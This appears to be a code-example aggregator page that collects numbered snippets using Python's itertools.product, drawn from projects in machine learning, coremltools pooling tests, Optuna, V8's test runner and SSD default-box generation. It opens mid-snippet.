                    energies.append(energy)
                    #Mark for deletion.
                    handled_interaction_pairs.add((v_instance, w_instance))

                min_energy = min(energies)

                self.add_interaction_energy_pair(v_consolidated,
                                                 w_consolidated, min_energy)

        #Now handle HIS.
        #See https://docs.python.org/2/library/itertools.html#itertools.permutations
        for v, w in permutations(iter(self.residue_variables.items()), 2):
            his_key, his_residue = v
            other_key, other_residue = w
            his_name = his_key[0]
            other_name = other_key[0]

            #We only care about his this pass
            if his_name != 'HIS':
                continue
            #HIS - HIS is already correct for what this pass does.
            if other_name == 'HIS':
                continue

            other_protinated, other_unprotonated = other_residue.get_prot_and_deprot_instances(
            )
            other_prot_consolidated = other_residue.instances["PROTONATED"]
            other_deprot_consolidated = other_residue.instances["DEPROTONATED"]

            his_protinated, his_unprotonated = his_residue.get_prot_and_deprot_instances(
            )
            his_stuff = his_protinated + his_unprotonated
            other_stuff = ((other_protinated, other_prot_consolidated),
                           (other_unprotonated, other_deprot_consolidated))

            #For every pairing of a HIS instance and another non HIS residue find the
            # minimum interaction energy and update the interaction map accordingly.
            #See https://docs.python.org/2/library/itertools.html#itertools.product
            for his_instance, other_product in product(his_stuff, other_stuff):
                other_instances, other_consolidated = other_product

                energies = []

                for other_instance in other_instances:
                    energy = self.interaction_energies[his_instance,
                                                       other_instance]
                    energies.append(energy)
                    handled_interaction_pairs.add(
                        (his_instance, other_instance))

                min_energy = min(energies)

                self.add_interaction_energy_pair(his_instance,
                                                 other_consolidated,
                                                 min_energy)

        #Clean out unused interaction energies
        self.drop_interaction_pairs(handled_interaction_pairs)

        for key, residue in self.residue_variables.items():
            name = key[0]
            if name == 'HIS':
                continue

            residue.instances = OrderedDict(
                (k, v) for k, v in residue.instances.items()
                if "PROTONATED" in k)
예제 #51
0
class TestL2Pool:
    @pytest.mark.parametrize(
        "use_cpu_only, backend, num_dims",
        itertools.product([True, False], backends, [1, 2]),
    )
    def test_builder_to_backend_smoke(self, use_cpu_only, backend, num_dims):
        kernel_sizes = [1, 2, 3]
        strides = [2, 1, 3]

        if num_dims == 1:
            x_val = np.array([[[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]]],
                             dtype=np.float32)
            expected_output_types = [(1, 1, 4, types.fp32),
                                     (1, 1, 3, types.fp32)]
            expected_outputs = [
                np.array([[[1.0, 3.0, 5.0, 7.0]]], dtype=np.float32),
                np.array([[[2.236068, 7.071068, 9.219544]]], dtype=np.float32),
            ]
        elif num_dims == 2:
            x_val = np.array(
                [[[[-10.0, -6.0], [-7.0, 9.0]], [[-3.0, 0.0], [11.0, 7.0]]]],
                dtype=np.float32,
            )
            expected_output_types = [(1, 2, 1, 1, types.fp32),
                                     (1, 2, 2, 1, types.fp32)]
            expected_outputs = [
                np.array([[[[11.66190338]], [[3.0]]]], dtype=np.float32),
                np.array(
                    [[[[16.309507], [11.401754]], [[13.379088], [13.038404]]]],
                    dtype=np.float32,
                ),
            ]
        else:  # num_dims == 3
            pass  # Enum PoolingType3D has no value defined for name L2

        input_values = {"x": x_val}
        input_placeholders = {"x": mb.placeholder(shape=x_val.shape)}

        def build(x):
            return [
                mb.l2_pool(
                    x=x,
                    kernel_sizes=kernel_sizes[:num_dims],
                    strides=strides[:num_dims],
                    pad_type="valid",
                ),
                mb.l2_pool(
                    x=x,
                    kernel_sizes=kernel_sizes[-num_dims:],
                    strides=strides[-num_dims:],
                    pad_type="same",
                ),
            ]

        run_compare_builder(
            build,
            input_placeholders,
            input_values,
            expected_output_types,
            expected_outputs,
            use_cpu_only=use_cpu_only,
            frontend_only=False,
            backend=backend,
        )
예제 #52
0
	def train(self, X, Y, normfac, radius, prevw):
        # the weight vector w is kept as a tuple - alpha_i * y_i and x_i, send only the required number of rows
		solvers.options['show_progress'] = False
		
		# Reduce maxiters and tolerance to reasonable levels
		solvers.options['maxiters'] = 2000
		solvers.options['abstol'] = 1e-2
		solvers.options['feastol'] = 1e-2

		row, col = X.shape
		
		P = matrix(0.0, (row+1,row+1))
		
		# Calculating the Kernel Matrix
		# Kernel matrix will now include multiple kernel matrices
		for i in range(row):
			for j in range(row):
				P[i,j] = Y[i] * self.kernel(X[i],X[j]) * Y[j]       # It's a PSD matrix, so its okay !
		
		# Summing over the kernel values between current set of points and prevw
		for i in range(row):
			P[i,row] = normfac * Y[i] * sum( prevw[k][0] * self.kernel(prevw[k][1], X[i]) for k in range(len(prevw)) )
			P[row,i] = P[i,row]

		# summing over the kernels value of the entire prevw matrix
		P[row, row] = pow(normfac,2) * sum( prevw[k][0] * self.kernel(prevw[k][1], prevw[r][1]) * prevw[r][0] for k,r in itertools.product(range(len(prevw)), range(len(prevw))) )

		# A point in the solution space for objective
		x_0 = matrix(0.5, (row+1, 1))
		
		normarr = matrix([normfac]*row + [normfac*(1-pow(radius,2)/2)]).T
		
		def F(x = None, z = None):
			
			if x is None:
			    return (0, x_0)                                         # Alpha's start from 0.5, first value is zero as there are zero non-linear objectives
			
			term = matrix(sqrt(x.T * P * x))
			
			f = matrix(term - normfac * sum(x[0:row]) - x[row] * normfac * (1-pow(radius,2)/2))                         # return the objective function
			
			# first derivative
			Df = (x.T * P)/term - normarr 						        # since for each alpha, normfac will be subtracted, norm arr is an array
			
			#print "Rank of Df"
			#print linalg.matrix_rank(Df)
			#print Df.size
			#print "Rank of f"
			#print linalg.matrix_rank(f)
			
			if z is None:
			    return f, Df
			
			term2 = matrix((P*x) * (P*x).T)
			H = z[0] * (P/term - term2/pow(term,3))                     # Second derivative of the objective function, is a symmetric matrix, so no need for spDiag ?
			
			#print "Rank of hessian"
			#print linalg.matrix_rank((P/term - term2/pow(term,3)))
			#print "Size of hessian"
			#print H.size
			
			return f, Df, H

		# for linear inequalities
		G = matrix(0.0, (row*2 + 1, row +1))									# there are two linear constaints for Alpha, one for Beta
		h = matrix(0.0, (row*2 +1, 1))
		for i in range(row):
			G[i,i] = -1.0       										# -Alpha <= 0
			G[row+i, i] = 1.0                                           #  Alpha <= 1
			h[row+i] = 1.0
		G[row*2, row] = -1.0                                            # -Beta <= 0

		#print "Rank of G"
		#print linalg.matrix_rank(G)
		#print "Rank of hessian"
		#print linalg.matrix_rank(h)
		

		# solve and return w
		sol = solvers.cp(F, G, h)
		
		#print sol
		
		alpha = sol['x'][0:row]
		beta = sol['x'][row]
		
		row_prev = len(prevw)
		templist = []
		
		for i in range(row):
			templist.append([alpha[i] * Y[i], X[i]])
		
		# Add Beta * Tau_k to the previous support vectors and store in current support vectors
		for i in range(row_prev):
			templist.append([prevw[i][0] * beta * normfac, prevw[i][1]])
		
		self.support = templist
예제 #53
0
 def _load_stream_without_unbatching(self, stream):
     key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
     val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
     for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
         # for correctness with repeated cartesian/zip this must be returned as one batch
         yield product(key_batch, val_batch)
예제 #54
0
    def classifier(self,
                   x,
                   scales,
                   filters,
                   repeat,
                   training,
                   getter=None,
                   dropout=0,
                   **kwargs):
        del kwargs
        bn_args = dict(training=training, momentum=0.999)

        def conv_args(k, f):
            return dict(padding='same',
                        use_bias=False,
                        kernel_initializer=tf.random_normal_initializer(
                            stddev=tf.rsqrt(0.5 * k * k * f)))

        def residual(x0, filters, stride=1):
            def branch():
                x = tf.nn.relu(x0)
                x = tf.layers.conv2d(x,
                                     filters,
                                     3,
                                     strides=stride,
                                     **conv_args(3, filters))
                x = tf.nn.relu(tf.layers.batch_normalization(x, **bn_args))
                x = tf.layers.conv2d(x, filters, 3, **conv_args(3, filters))
                x = tf.layers.batch_normalization(x, **bn_args)
                return x

            x = layers.shakeshake(branch(), branch(), training)

            if stride == 2:
                x1 = tf.layers.conv2d(tf.nn.relu(x0[:, ::2, ::2]),
                                      filters >> 1, 1,
                                      **conv_args(1, filters >> 1))
                x2 = tf.layers.conv2d(tf.nn.relu(x0[:, 1::2, 1::2]),
                                      filters >> 1, 1,
                                      **conv_args(1, filters >> 1))
                x0 = tf.concat([x1, x2], axis=3)
                x0 = tf.layers.batch_normalization(x0, **bn_args)
            elif x0.get_shape()[3] != filters:
                x0 = tf.layers.conv2d(x0, filters, 1, **conv_args(1, filters))
                x0 = tf.layers.batch_normalization(x0, **bn_args)

            return x0 + x

        with tf.variable_scope('classify',
                               reuse=tf.AUTO_REUSE,
                               custom_getter=getter):
            y = tf.layers.conv2d((x - self.dataset.mean) / self.dataset.std,
                                 16, 3, **conv_args(3, 16))
            for scale, i in itertools.product(range(scales), range(repeat)):
                with tf.variable_scope('layer%d.%d' % (scale + 1, i)):
                    if i == 0:
                        y = residual(y,
                                     filters << scale,
                                     stride=2 if scale else 1)
                    else:
                        y = residual(y, filters << scale)

            y = embeds = tf.reduce_mean(y, [1, 2])
            if dropout and training:
                y = tf.nn.dropout(y, 1 - dropout)
            logits = tf.layers.dense(
                y,
                self.nclass,
                kernel_initializer=tf.glorot_normal_initializer())
        return EasyDict(logits=logits, embeds=embeds)
예제 #55
0
    # Currently, maximization is not implemented.
    with pytest.raises(ValueError):
        study = optuna.create_study(direction='maximize')
        study.optimize(func, n_trials=10)
        assert study.direction == optuna.structs.StudyDirection.MAXIMIZE
        check_study(study)

    with pytest.raises(ValueError):
        optuna.create_study(direction='test')


@pytest.mark.parametrize(
    'n_trials, n_jobs, storage_mode',
    itertools.product(
        (0, 1, 2, 50),  # n_trials
        (1, 2, 10, -1),  # n_jobs
        STORAGE_MODES,  # storage_mode
    ))
def test_optimize_parallel(n_trials, n_jobs, storage_mode):
    # type: (int, int, str)-> None

    f = Func()

    with StorageSupplier(storage_mode) as storage:
        study = optuna.create_study(storage=storage)
        study.optimize(f, n_trials=n_trials, n_jobs=n_jobs)
        assert f.n_calls == len(study.trials) == n_trials
        check_study(study)


@pytest.mark.parametrize(
예제 #56
0
class TestAvgPool:
    @pytest.mark.parametrize(
        "use_cpu_only, backend, num_dims",
        itertools.product([True, False], backends, [1, 2, 3]),
    )
    def test_builder_to_backend_smoke(self, use_cpu_only, backend, num_dims):
        kernel_sizes = [1, 2, 3]
        strides = [2, 1, 3]

        if num_dims == 1:
            x_val = np.array([[[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]]],
                             dtype=np.float32)
            expected_output_types = [(1, 1, 4, types.fp32),
                                     (1, 1, 3, types.fp32)]
            expected_outputs = [
                np.array([[[1.0, 3.0, 5.0, 7.0]]], dtype=np.float32),
                np.array([[[1.5, 4.0, 6.5]]], dtype=np.float32),
            ]
        elif num_dims == 2:
            x_val = np.array(
                [[
                    [[-10.80291205, -6.42076184], [-7.07910997, 9.1913279]],
                    [[-3.18181497, 0.9132147], [11.9785544, 7.92449539]],
                ]],
                dtype=np.float32,
            )
            expected_output_types = [(1, 2, 1, 1, types.fp32),
                                     (1, 2, 2, 1, types.fp32)]
            expected_outputs = [
                np.array([[[[-8.611837]], [[-1.1343001]]]], dtype=np.float32),
                np.array(
                    [[[[-3.7778642], [1.056109]], [[4.4086123], [9.951525]]]],
                    dtype=np.float32,
                ),
            ]
        else:  # num_dims == 3
            x_val = np.array(
                [
                    [[
                        [[-1, -5, -1], [-3, -3, 8], [2, 6, 2]],
                        [[-4, 7, -4], [4, 6, 7], [4, 4, 8]],
                        [[5, -3, 5], [0, -5, 8], [1, 7, 2]],
                    ]],
                    [[
                        [[7, -3, -5], [5, 4, 7], [-2, -4, -3]],
                        [[-4, 3, -1], [6, -4, 4], [3, 6, 2]],
                        [[-1, 4, -4], [-2, -1, -2], [3, 2, 8]],
                    ]],
                ],
                dtype=np.float32,
            )
            expected_output_types = [
                (2, 1, 2, 2, 1, types.fp32),
                (2, 1, 2, 3, 1, types.fp32),
            ]
            expected_outputs = [
                np.array(
                    [
                        [[[[-0.8333334], [2.0]], [[1.6666667], [2.1666667]]]],
                        [[[[2.5], [1.1666667]], [[-1.0], [1.3333334]]]],
                    ],
                    dtype=np.float32,
                ),
                np.array(
                    [
                        [[
                            [[-0.8333334], [2.0], [3.3333335]],
                            [[1.6666667], [2.1666667], [3.3333335]],
                        ]],
                        [[
                            [[2.5], [1.1666667], [-3.0]],
                            [[-1.0], [1.3333334], [4.3333335]],
                        ]],
                    ],
                    dtype=np.float32,
                ),
            ]

        input_values = {"x": x_val}
        input_placeholders = {"x": mb.placeholder(shape=x_val.shape)}

        def build(x):
            return [
                mb.avg_pool(
                    x=x,
                    kernel_sizes=kernel_sizes[:num_dims],
                    strides=strides[:num_dims],
                    pad_type="valid",
                ),
                mb.avg_pool(
                    x=x,
                    kernel_sizes=kernel_sizes[-num_dims:],
                    strides=strides[-num_dims:],
                    pad_type="same",
                    exclude_padding_from_average=True,
                ),
            ]

        run_compare_builder(
            build,
            input_placeholders,
            input_values,
            expected_output_types,
            expected_outputs,
            use_cpu_only=use_cpu_only,
            frontend_only=False,
            backend=backend,
        )
예제 #57
0
print()

# 연결1
gen5 = itertools.chain('ABCDE', range(1, 11, 2))

print(list(gen5))

# 연결2

gen6 = itertools.chain(enumerate('ABCDE'))

print(list(gen6))

# 개별
gen7 = itertools.product('ABCDE')

print(list(gen7))

# 연산(경우의 수)
gen8 = itertools.product('ABCDE', repeat=2)

print(list(gen8))

# 그룹화
gen9 = itertools.groupby('AAABBCCCCDDEEE')

# print(list(gen9))

for chr, group in gen9:
    print(chr, ' : ', list(group))
예제 #58
0
 def num_unique(x, ycol, tol):
     def _err(x1, x2):
         return np.abs(x1 - x2) / (2 * np.abs(x1 + x2))
     vals = [list(x[ycol].values), list(x[ycol].values)]
     arr = np.array([_err(*p) for p in product(*vals) if p[0] > p[1]])
     return len(arr[arr > tol])  # number of different values
예제 #59
0
def ProcessOptions(options):
  global VARIANTS

  # First try to auto-detect configurations based on the build if GN was
  # used. This can't be overridden by cmd-line arguments.
  options.auto_detect = False
  if options.gn:
    gn_out_dir = os.path.join(BASE_DIR, DEFAULT_OUT_GN)
    latest_timestamp = -1
    latest_config = None
    for gn_config in os.listdir(gn_out_dir):
      gn_config_dir = os.path.join(gn_out_dir, gn_config)
      if not isdir(gn_config_dir):
        continue
      if os.path.getmtime(gn_config_dir) > latest_timestamp:
        latest_timestamp = os.path.getmtime(gn_config_dir)
        latest_config = gn_config
    if latest_config:
      print(">>> Latest GN build found is %s" % latest_config)
      options.outdir = os.path.join(DEFAULT_OUT_GN, latest_config)

  if options.buildbot:
    build_config_path = os.path.join(
        BASE_DIR, options.outdir, options.mode, "v8_build_config.json")
  else:
    build_config_path = os.path.join(
        BASE_DIR, options.outdir, "v8_build_config.json")

  # Auto-detect test configurations based on the build (GN only).
  if os.path.exists(build_config_path):
    try:
      with open(build_config_path) as f:
        build_config = json.load(f)
    except Exception:
      print ("%s exists but contains invalid json. Is your build up-to-date?" %
             build_config_path)
      return False
    options.auto_detect = True

    # In auto-detect mode the outdir is always where we found the build config.
    # This ensures that we'll also take the build products from there.
    options.outdir = os.path.dirname(build_config_path)
    options.arch_and_mode = None
    if options.mode:
      # In auto-detect mode we don't use the mode for more path-magic.
      # Therefore transform the buildbot mode here to fit to the GN build
      # config.
      options.mode = BuildbotToV8Mode(options.mode)

    # In V8 land, GN's x86 is called ia32.
    if build_config["v8_target_cpu"] == "x86":
      build_config["v8_target_cpu"] = "ia32"

    # Update options based on the build config. Sanity check that we're not
    # trying to use inconsistent options.
    for param, value in (
        ('arch', build_config["v8_target_cpu"]),
        ('asan', build_config["is_asan"]),
        ('dcheck_always_on', build_config["dcheck_always_on"]),
        ('gcov_coverage', build_config["is_gcov_coverage"]),
        ('mode', 'debug' if build_config["is_debug"] else 'release'),
        ('msan', build_config["is_msan"]),
        ('no_i18n', not build_config["v8_enable_i18n_support"]),
        ('no_snap', not build_config["v8_use_snapshot"]),
        ('tsan', build_config["is_tsan"]),
        ('ubsan_vptr', build_config["is_ubsan_vptr"])):
      cmd_line_value = getattr(options, param)
      if cmd_line_value not in [None, True, False] and cmd_line_value != value:
        # TODO(machenbach): This is for string options only. Requires options
        # to not have default values. We should make this more modular and
        # implement it in our own version of the option parser.
        print "Attempted to set %s to %s, while build is %s." % (
            param, cmd_line_value, value)
        return False
      if cmd_line_value == True and value == False:
        print "Attempted to turn on %s, but it's not available." % (
            param)
        return False
      if cmd_line_value != value:
        print ">>> Auto-detected %s=%s" % (param, value)
      setattr(options, param, value)

  else:
    # Non-GN build without auto-detect. Set default values for missing
    # parameters.
    if not options.mode:
      options.mode = "release,debug"
    if not options.arch:
      options.arch = "ia32,x64,arm"

  # Architecture and mode related stuff.
  if options.arch_and_mode:
    options.arch_and_mode = [arch_and_mode.split(".")
        for arch_and_mode in options.arch_and_mode.split(",")]
    options.arch = ",".join([tokens[0] for tokens in options.arch_and_mode])
    options.mode = ",".join([tokens[1] for tokens in options.arch_and_mode])
  options.mode = options.mode.split(",")
  for mode in options.mode:
    if not BuildbotToV8Mode(mode) in MODES:
      print "Unknown mode %s" % mode
      return False
  if options.arch in ["auto", "native"]:
    options.arch = ARCH_GUESS
  options.arch = options.arch.split(",")
  for arch in options.arch:
    if not arch in SUPPORTED_ARCHS:
      print "Unknown architecture %s" % arch
      return False

  # Store the final configuration in arch_and_mode list. Don't overwrite
  # predefined arch_and_mode since it is more expressive than arch and mode.
  if not options.arch_and_mode:
    options.arch_and_mode = itertools.product(options.arch, options.mode)

  # Special processing of other options, sorted alphabetically.

  if options.buildbot:
    options.network = False
  if options.command_prefix and options.network:
    print("Specifying --command-prefix disables network distribution, "
          "running tests locally.")
    options.network = False
  options.command_prefix = shlex.split(options.command_prefix)
  options.extra_flags = sum(map(shlex.split, options.extra_flags), [])

  if options.gc_stress:
    options.extra_flags += GC_STRESS_FLAGS

  if options.asan:
    options.extra_flags.append("--invoke-weak-callbacks")
    options.extra_flags.append("--omit-quit")

  if options.novfp3:
    options.extra_flags.append("--noenable-vfp3")

  if options.exhaustive_variants:
    # This is used on many bots. It includes a larger set of default variants.
    # Other options for manipulating variants still apply afterwards.
    VARIANTS = EXHAUSTIVE_VARIANTS

  # TODO(machenbach): Figure out how to test a bigger subset of variants on
  # msan.
  if options.msan:
    VARIANTS = ["default"]

  if options.j == 0:
    options.j = multiprocessing.cpu_count()

  if options.random_seed_stress_count <= 1 and options.random_seed == 0:
    options.random_seed = RandomSeed()

  def excl(*args):
    """Returns true if zero or one of multiple arguments are true."""
    return reduce(lambda x, y: x + y, args) <= 1

  if not excl(options.no_variants, bool(options.variants)):
    print("Use only one of --no-variants or --variants.")
    return False
  if options.quickcheck:
    VARIANTS = ["default", "stress"]
    options.slow_tests = "skip"
    options.pass_fail_tests = "skip"
  if options.no_variants:
    VARIANTS = ["default"]
  if options.variants:
    VARIANTS = options.variants.split(",")

    # Resolve variant aliases.
    VARIANTS = reduce(
        list.__add__,
        (VARIANT_ALIASES.get(v, [v]) for v in VARIANTS),
        [],
    )

    if not set(VARIANTS).issubset(ALL_VARIANTS):
      print "All variants must be in %s" % str(ALL_VARIANTS)
      return False
  if options.predictable:
    VARIANTS = ["default"]
    options.extra_flags.append("--predictable")
    options.extra_flags.append("--verify_predictable")
    options.extra_flags.append("--no-inline-new")

  # Dedupe.
  VARIANTS = list(set(VARIANTS))

  if not options.shell_dir:
    if options.shell:
      print "Warning: --shell is deprecated, use --shell-dir instead."
      options.shell_dir = os.path.dirname(options.shell)
  if options.valgrind:
    run_valgrind = os.path.join("tools", "run-valgrind.py")
    # This is OK for distributed running, so we don't need to disable network.
    options.command_prefix = (["python", "-u", run_valgrind] +
                              options.command_prefix)
  def CheckTestMode(name, option):
    if not option in ["run", "skip", "dontcare"]:
      print "Unknown %s mode %s" % (name, option)
      return False
    return True
  if not CheckTestMode("slow test", options.slow_tests):
    return False
  if not CheckTestMode("pass|fail test", options.pass_fail_tests):
    return False
  if options.no_i18n:
    TEST_MAP["bot_default"].remove("intl")
    TEST_MAP["default"].remove("intl")
  return True
    def __init__(self,
                 fig_size,
                 feat_size,
                 steps,
                 scales,
                 aspect_ratios,
                 scale_xy=0.1,
                 scale_wh=0.2):
        self.fig_size = fig_size  # 输入网络的图像大小 300
        # [38, 19, 10, 5, 3, 1]
        self.feat_size = feat_size  # 每个预测层的feature map尺寸

        self.scale_xy_ = scale_xy
        self.scale_wh_ = scale_wh

        # According to https://github.com/weiliu89/caffe
        # Calculation method slightly different from paper
        # [8, 16, 32, 64, 100, 300]
        self.steps = steps  # 每个特征层上的一个cell在原图上的跨度

        # [21, 45, 99, 153, 207, 261, 315]
        self.scales = scales  # 每个特征层上预测的default box的scale

        fk = fig_size / np.array(steps)  # 计算每层特征层的fk
        # [[2], [2, 3], [2, 3], [2, 3], [2], [2]]
        self.aspect_ratios = aspect_ratios  # 每个预测特征层上预测的default box的ratios

        self.default_boxes = []
        # size of feature and number of feature
        # 遍历每层特征层,计算default box
        for idx, sfeat in enumerate(self.feat_size):
            sk1 = scales[idx] / fig_size  # scale转为相对值[0-1]
            sk2 = scales[idx + 1] / fig_size  # scale转为相对值[0-1]
            sk3 = sqrt(sk1 * sk2)
            # 先添加两个1:1比例的default box宽和高
            all_sizes = [(sk1, sk1), (sk3, sk3)]

            # 再将剩下不同比例的default box宽和高添加到all_sizes中
            for alpha in aspect_ratios[idx]:
                w, h = sk1 * sqrt(alpha), sk1 / sqrt(alpha)
                all_sizes.append((w, h))
                all_sizes.append((h, w))

            # 计算当前特征层对应原图上的所有default box
            for w, h in all_sizes:
                for i, j in itertools.product(
                        range(sfeat), repeat=2):  # i -> 行(y), j -> 列(x)
                    # 计算每个default box的中心坐标(范围是在0-1之间)
                    cx, cy = (j + 0.5) / fk[idx], (i + 0.5) / fk[idx]
                    self.default_boxes.append((cx, cy, w, h))

        # 将default_boxes转为tensor格式
        self.dboxes = torch.tensor(self.default_boxes,
                                   dtype=torch.float32)  # 这里不转类型会报错
        self.dboxes.clamp_(min=0, max=1)  # 将坐标(x, y, w, h)都限制在0-1之间

        # For IoU calculation
        # ltrb is left top coordinate and right bottom coordinate
        # 将(x, y, w, h)转换成(xmin, ymin, xmax, ymax),方便后续计算IoU(匹配正负样本时)
        self.dboxes_ltrb = self.dboxes.clone()
        self.dboxes_ltrb[:,
                         0] = self.dboxes[:,
                                          0] - 0.5 * self.dboxes[:, 2]  # xmin
        self.dboxes_ltrb[:,
                         1] = self.dboxes[:,
                                          1] - 0.5 * self.dboxes[:, 3]  # ymin
        self.dboxes_ltrb[:,
                         2] = self.dboxes[:,
                                          0] + 0.5 * self.dboxes[:, 2]  # xmax
        self.dboxes_ltrb[:,
                         3] = self.dboxes[:,
                                          1] + 0.5 * self.dboxes[:, 3]  # ymax